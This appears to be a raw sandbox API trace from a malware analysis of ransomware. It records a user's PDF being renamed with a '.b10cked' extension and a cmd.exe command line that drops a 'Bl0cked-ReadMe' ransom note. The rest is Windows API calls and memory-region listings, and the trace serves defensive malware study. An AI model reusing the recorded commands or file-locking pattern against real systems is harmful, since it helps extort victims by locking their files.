SetErrorMode (uMode=0x0) returned 0x1 [0141.659] SetLastError (dwErrCode=0x0) [0141.659] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\taxjkdn0yokx7tsspc.pdf.b10cked")) returned 0xffffffff [0141.659] GetLastError () returned 0x2 [0141.659] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF", fInfoLevelId=0x1, lpFindFileData=0x2ee804, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee804) returned 0x4b0f48 [0141.659] FindNextFileW (in: hFindFile=0x4b0f48, lpFindFileData=0x2ee804 | out: lpFindFileData=0x2ee804) returned 0 [0141.660] GetLastError () returned 0x12 [0141.660] FindClose (in: hFindFile=0x4b0f48 | out: hFindFile=0x4b0f48) returned 1 [0141.660] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF", fInfoLevelId=0x1, lpFindFileData=0x4c1c68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c1c68) returned 0x4b0f48 [0141.661] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked", nBufferLength=0x104, lpBuffer=0x2eea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked", lpFilePart=0x0) returned 0x46 [0141.661] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf", nBufferLength=0x104, lpBuffer=0x2eea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf", lpFilePart=0x0) returned 0x3e [0141.661] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\taxjkdn0yokx7tsspc.pdf")) returned 0x20 [0141.661] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\taxjkdn0yokx7tsspc.pdf"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\taxjkdn0yokx7tsspc.pdf.b10cked"), dwFlags=0x3) returned 1 [0141.661] FindClose (in: hFindFile=0x4b0f48 | out: hFindFile=0x4b0f48) returned 1 [0141.661] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eea50 | out: _Buffer=" 1") returned 9 [0141.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.661] GetFileType (hFile=0x7) returned 0x2 [0142.249] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.249] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ee9dc | out: lpMode=0x2ee9dc) returned 1 [0142.249] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.249] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eea10 | out: lpConsoleScreenBufferInfo=0x2eea10) returned 1 [0142.249] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0142.250] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eea50 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0142.250] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eea34, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eea34*=0x1a) returned 1 [0142.250] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.250] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.250] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.250] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.250] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.250] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.251] SetConsoleInputExeNameW () returned 0x1 [0142.251] GetConsoleOutputCP () returned 0x1b5 [0142.251] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.251] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.251] exit (_Code=0) Process: id = "174" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d20" os_pid = "0xe90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 15008 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15009 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15010 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15011 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 15012 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15013 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15014 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15015 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15016 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 15017 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16046 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16047 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16048 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16049 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 16050 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 16051 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16052 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16053 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16054 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16055 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16056 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16057 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16058 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16059 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16060 start_va = 0x2e0000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 16061 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16062 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16063 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16064 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 16065 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 16066 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 16067 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 16068 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 16069 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 231 os_tid = 0xeb4 [0141.683] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf90c | out: lpSystemTimeAsFileTime=0x1cf90c*(dwLowDateTime=0x8e61be00, dwHighDateTime=0x1d440a9)) [0141.683] GetCurrentProcessId () returned 0xe90 [0141.683] GetCurrentThreadId () returned 0xeb4 [0141.683] GetTickCount () returned 0x2c65a [0141.683] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf904 | out: lpPerformanceCount=0x1cf904*=19847230024) returned 1 [0141.684] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.684] __set_app_type (_Type=0x1) [0141.684] __p__fmode () returned 0x76b331f4 [0141.684] __p__commode () returned 0x76b331fc [0141.684] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.684] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.684] GetCurrentThreadId () returned 0xeb4 [0141.684] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeb4) returned 0x38 [0141.684] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.684] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.684] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.685] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.685] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf89c | out: phkResult=0x1cf89c*=0x0) returned 0x2 [0141.685] VirtualQuery (in: lpAddress=0x1cf8d3, lpBuffer=0x1cf86c, dwLength=0x1c | out: lpBuffer=0x1cf86c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.685] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf86c, dwLength=0x1c | out: lpBuffer=0x1cf86c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.685] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf86c, dwLength=0x1c | out: lpBuffer=0x1cf86c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.685] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf86c, dwLength=0x1c | out: lpBuffer=0x1cf86c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.685] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf86c, dwLength=0x1c | out: lpBuffer=0x1cf86c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0141.685] GetConsoleOutputCP () returned 0x1b5 [0141.685] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.685] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.685] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.685] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.685] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.685] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.685] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.685] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.686] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.686] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.686] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.686] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.686] GetEnvironmentStringsW () returned 0x1f0198* [0141.686] FreeEnvironmentStringsW (penv=0x1f0198) returned 1 [0141.686] GetEnvironmentStringsW () returned 0x1f0198* [0141.686] FreeEnvironmentStringsW (penv=0x1f0198) returned 1 [0141.686] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce80c | out: phkResult=0x1ce80c*=0x40) returned 0x0 [0141.686] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x0, lpData=0x1ce818*=0xc0, lpcbData=0x1ce810*=0x1000) returned 0x2 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x4, lpData=0x1ce818*=0x1, lpcbData=0x1ce810*=0x4) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x0, lpData=0x1ce818*=0x1, lpcbData=0x1ce810*=0x1000) returned 0x2 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x4, lpData=0x1ce818*=0x0, lpcbData=0x1ce810*=0x4) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x4, lpData=0x1ce818*=0x40, lpcbData=0x1ce810*=0x4) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x4, lpData=0x1ce818*=0x40, lpcbData=0x1ce810*=0x4) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x0, lpData=0x1ce818*=0x40, lpcbData=0x1ce810*=0x1000) returned 0x2 [0141.687] RegCloseKey (hKey=0x40) returned 0x0 [0141.687] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce80c | out: phkResult=0x1ce80c*=0x40) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x0, lpData=0x1ce818*=0x40, lpcbData=0x1ce810*=0x1000) returned 0x2 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x4, lpData=0x1ce818*=0x1, lpcbData=0x1ce810*=0x4) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x0, lpData=0x1ce818*=0x1, lpcbData=0x1ce810*=0x1000) returned 0x2 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x4, lpData=0x1ce818*=0x0, lpcbData=0x1ce810*=0x4) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x4, lpData=0x1ce818*=0x9, lpcbData=0x1ce810*=0x4) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x4, lpData=0x1ce818*=0x9, lpcbData=0x1ce810*=0x4) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x0, lpData=0x1ce818*=0x9, lpcbData=0x1ce810*=0x1000) returned 0x2 [0141.687] RegCloseKey (hKey=0x40) returned 0x0 [0141.687] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.687] srand (_Seed=0x5b886370) [0141.687] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0141.687] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0141.687] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.688] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1f18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.688] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.688] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.688] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.688] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.688] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.688] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.688] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.688] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.688] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.688] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.688] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.688] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.688] GetEnvironmentStringsW () returned 0x1f22e8* [0141.688] FreeEnvironmentStringsW (penv=0x1f22e8) returned 1 [0141.688] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.688] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.688] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.688] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.688] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.688] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.688] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.688] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.688] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.688] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.689] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf5d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.689] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf5d8, lpFilePart=0x1cf5d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf5d4*="Desktop") returned 0x18 [0141.689] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.689] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf354 | out: lpFindFileData=0x1cf354) returned 0x1f0028 [0141.689] FindClose (in: hFindFile=0x1f0028 | out: hFindFile=0x1f0028) returned 1 [0141.689] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf354 | out: lpFindFileData=0x1cf354) returned 0x1f0028 [0141.689] FindClose (in: hFindFile=0x1f0028 | out: hFindFile=0x1f0028) returned 1 [0141.689] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf354 | out: lpFindFileData=0x1cf354) returned 0x1f0028 [0141.689] FindClose (in: hFindFile=0x1f0028 | out: hFindFile=0x1f0028) returned 1 [0141.689] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.689] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.689] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.689] GetEnvironmentStringsW () returned 0x1f2b08* [0141.690] FreeEnvironmentStringsW (penv=0x1f2b08) returned 1 [0141.690] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.690] GetConsoleOutputCP () returned 0x1b5 [0141.690] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.690] GetUserDefaultLCID () returned 0x409 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf718, cchData=128 | out: lpLCData="0") returned 2 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf718, cchData=128 | out: lpLCData="0") returned 2 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf718, cchData=128 | out: lpLCData="1") returned 2 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 